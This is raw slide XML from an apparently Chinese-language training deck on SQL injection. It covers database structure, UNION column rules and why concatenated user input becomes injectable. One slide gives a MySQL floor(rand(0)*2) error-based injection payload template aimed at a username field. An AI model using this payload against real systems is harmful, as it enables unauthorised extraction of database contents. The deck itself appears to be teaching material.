              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>floor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44E4600-7206-4956-9EFB-7629FCA5F71C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524833" y="3231362"/>
            <a:ext cx="2049584" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A1E5B6-4346-489F-B6D5-16547ABC893D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677520" y="3705432"/>
            <a:ext cx="11122705" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>=' union select 1 from (select count(*),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>slelect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>),floor(rand(0)*2))x </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>                                                                                              from "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>一个足大的表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>" group by x)a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{516F7204-04A6-4260-B592-E3714CA1250C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4569246" y="1527628"/>
            <a:ext cx="6566181" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select * from user where username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="676078265"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="354858"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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pc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675054" y="628441"/>
            <a:ext cx="3447063" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E35212-D512-4A99-8389-6CDF23717816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950098" y="1291200"/>
            <a:ext cx="3375001" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关系型数据库的结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4686975-B908-4659-82DA-2068697D7BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545067" y="2273087"/>
            <a:ext cx="3693127" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>数据库管理系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dbms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(database)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(table)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(column)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(value) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{798EC907-E2A3-4A74-97F5-7BB9146DAE2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759751" y="1658159"/>
            <a:ext cx="8003259" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="487807493"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
